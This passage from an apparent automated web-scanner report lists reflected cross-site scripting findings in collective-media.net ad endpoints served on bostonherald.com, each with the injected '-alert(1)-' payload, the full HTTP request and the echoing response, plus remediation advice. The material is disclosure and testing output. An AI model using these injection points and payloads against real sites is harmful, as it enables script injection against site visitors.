var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/news;sz=728x90;net=q1;ord=354527464?c1595'-alert(1)-'d3ce0ff70fa;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.22. http://a.collective-media.net/cmadj/cm.rev_bostonherald/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/cm.rev_bostonherald/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11b93'-alert(1)-'1cfbaccfaf5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.rev_bostonherald11b93'-alert(1)-'1cfbaccfaf5/;sz=728x90;net=cm;ord=%23PCACHEBUSTER;env=ifr;ord1=40053;cmpgurl=http%253A//bostonherald.com/includes/processAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 8338
Date: Sat, 17 Sep 2011 01:49:07 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-30420328179_1316224147","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rev_bostonherald11b93'-alert(1)-'1cfbaccfaf5&size=728x90&imp_id=cm-30420328179_1316224147,12298b058f07061&referrer=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CRight%2CBottom%26page%3Dbh.heraldint
...[SNIP]...

4.23. http://a.collective-media.net/cmadj/cm.rev_bostonherald/ [sz parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://a.collective-media.net
Path:   /cmadj/cm.rev_bostonherald/

Issue detail

The value of the sz request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a58b8(a)cb7eca68845 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.rev_bostonherald/;sz=a58b8(a)cb7eca68845 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 8090
Date: Sat, 17 Sep 2011 01:48:50 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
</scr'+'ipt>');var bap_rnd = Math.floor(Math.random()*100000);
var _bao = {
coid:44,
nid:546,
ad_h:,
ad_w:a58b8(a)cb7eca68845,
uqid:bap_rnd,
cps:''
};
document.write('<img style="margin:0;padding:0;" border="0" width="0" height="0" src="http://c.betrad.com/a/4.gif" id="bap-pixel-'+bap_rnd+'"/>
...[SNIP]...

4.24. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67d0f'-alert(1)-'238029b5c84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj67d0f'-alert(1)-'238029b5c84/iblocal.revinet.bostonherald/audience;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER;env=ifr;ord1=449493;cmpgurl=http%253A//bostonherald.com/news/regional/view.bg%253Farticleid%253D1366356%2526position%253D1? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:29 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7400

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30221086088_1316222009","http://ad.doubleclick.net/adj67d0f'-alert(1)-'238029b5c84/iblocal.revinet.bostonherald/audience;net=iblocal;u=,iblocal-30221086088_1316222009,12298b058f07061,polit,;;cmw=owl;sz=160x600;net=iblocal;env=ifr;ord1=449493;contx=polit;dc=s;btg=;ord=%23PCACHEBUSTER
...[SNIP]...

4.25. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8c69'-alert(1)-'5b29faf592d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/iblocal.revinet.bostonheraldf8c69'-alert(1)-'5b29faf592d/audience;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER;env=ifr;ord1=449493;cmpgurl=http%253A//bostonherald.com/news/regional/view.bg%253Farticleid%253D1366356%2526position%253D1? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Date: Sat, 17 Sep 2011 01:13:33 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7392

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30501481718_1316222013","http://ad.doubleclick.net/adj/iblocal.revinet.bostonheraldf8c69'-alert(1)-'5b29faf592d/audience;net=iblocal;u=,iblocal-30501481718_1316222013,12298b058f07061,polit,;;sz=160x600;net=iblocal;env=ifr;ord1=449493;contx=polit;dc=s;btg=;ord=%23PCACHEBUSTER?","160","600",true);</scr'+'ipt>
...[SNIP]...

4.26. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60a13'-alert(1)-'30c480b6c14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/iblocal.revinet.bostonherald/audience60a13'-alert(1)-'30c480b6c14;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER;env=ifr;ord1=449493;cmpgurl=http%253A//bostonherald.com/news/regional/view.bg%253Farticleid%253D1366356%2526position%253D1? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:37 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7392

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30201561711_1316222017","http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience60a13'-alert(1)-'30c480b6c14;net=iblocal;u=,iblocal-30201561711_1316222017,12298b058f07061,polit,;;sz=160x600;net=iblocal;env=ifr;ord1=449493;contx=polit;dc=s;btg=;ord=%23PCACHEBUSTER?","160","600",true);</scr'+'ipt>
...[SNIP]...

4.27. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 743e9'-alert(1)-'e734a6f0a30 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/iblocal.revinet.bostonherald/audience;sz=743e9'-alert(1)-'e734a6f0a30 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:20 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7353

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
iveMedia.createAndAttachAd("iblocal-30322160699_1316222000","http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience;net=iblocal;u=,iblocal-30322160699_1316222000,12298b058f07061,none,;;sz=743e9'-alert(1)-'e734a6f0a30;contx=none;dc=s;btg=?","743e9'-alert(1)-'e734a6f0a30","",true);</scr'+'ipt>
...[SNIP]...

4.28. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/be_news

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80447'-alert(1)-'f91ca21afff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj80447'-alert(1)-'f91ca21afff/q1.bosherald/be_news;sz=300x250;net=q1;ord=2118037356?;env=ifr;ord1=36513;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7358
Date: Sat, 17 Sep 2011 01:09:51 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30219867092_1316221791","http://ad.doubleclick.net/adj80447'-alert(1)-'f91ca21afff/q1.bosherald/be_news;net=q1;u=,q1-30219867092_1316221791,12298b058f07061,polit,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=36513;contx=polit;dc=s;btg=;ord=2118037356??","300","250",true);</scr'+'ipt>
...[SNIP]...

4.29. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/be_news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87eb6'-alert(1)-'9d423e3fbe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald87eb6'-alert(1)-'9d423e3fbe/be_news;sz=300x250;net=q1;ord=2118037356?;env=ifr;ord1=36513;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7357
Date: Sat, 17 Sep 2011 01:09:52 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30419616533_1316221792","http://ad.doubleclick.net/adj/q1.bosherald87eb6'-alert(1)-'9d423e3fbe/be_news;net=q1;u=,q1-30419616533_1316221792,12298b058f07061,polit,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=36513;contx=polit;dc=s;btg=;ord=2118037356??","300","250",true);</scr'+'ipt>
...[SNIP]...

4.30. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/be_news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7479'-alert(1)-'d7ae9e9aabb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald/be_newsc7479'-alert(1)-'d7ae9e9aabb;sz=300x250;net=q1;ord=2118037356?;env=ifr;ord1=36513;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7358
Date: Sat, 17 Sep 2011 01:09:53 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30503457423_1316221793","http://ad.doubleclick.net/adj/q1.bosherald/be_newsc7479'-alert(1)-'d7ae9e9aabb;net=q1;u=,q1-30503457423_1316221793,12298b058f07061,polit,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=36513;contx=polit;dc=s;btg=;ord=2118037356??","300","250",true);</scr'+'ipt>
...[SNIP]...

4.31. http://a.collective-media.net/cmadj/q1.bosherald/be_news [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/be_news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7744'-alert(1)-'53b38ddfa3a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald/be_news;sz=a7744'-alert(1)-'53b38ddfa3a HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7330
Date: Sat, 17 Sep 2011 01:09:49 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
ge="Javascript">CollectiveMedia.createAndAttachAd("q1-30207990841_1316221788","http://ad.doubleclick.net/adj/q1.bosherald/be_news;net=q1;u=,q1-30207990841_1316221788,12298b058f07061,none,;;cmw=nurl;sz=a7744'-alert(1)-'53b38ddfa3a;contx=none;dc=s;btg=?","a7744'-alert(1)-'53b38ddfa3a","",true);</scr'+'ipt>
...[SNIP]...

4.32. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d09a'-alert(1)-'33f55d64be5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj4d09a'-alert(1)-'33f55d64be5/q1.bosherald/ent_fr;sz=300x250;net=q1;ord=1813138297?;env=ifr;ord1=336916;cmpgurl=http%253A//bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7354
Date: Sat, 17 Sep 2011 01:20:15 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30105513189_1316222415","http://ad.doubleclick.net/adj4d09a'-alert(1)-'33f55d64be5/q1.bosherald/ent_fr;net=q1;u=,q1-30105513189_1316222415,12298b058f07061,ent,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=336916;contx=ent;dc=s;btg=;ord=1813138297??","300","250",true);</scr'+'ipt>
...[SNIP]...

4.33. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fae6'-alert(1)-'317c5c0c938 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald5fae6'-alert(1)-'317c5c0c938/ent_fr;sz=300x250;net=q1;ord=1813138297?;env=ifr;ord1=336916;cmpgurl=http%253A//bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7354
Date: Sat, 17 Sep 2011 01:20:19 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

